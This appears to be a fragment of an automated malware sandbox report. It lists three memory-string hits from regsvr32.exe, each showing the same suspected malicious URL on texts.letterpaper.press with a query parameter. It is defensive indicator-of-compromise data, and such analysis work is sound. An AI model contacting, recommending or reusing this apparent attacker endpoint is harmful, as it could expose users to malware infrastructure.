        Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190db
        Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190db;M
        Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmpString found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190d~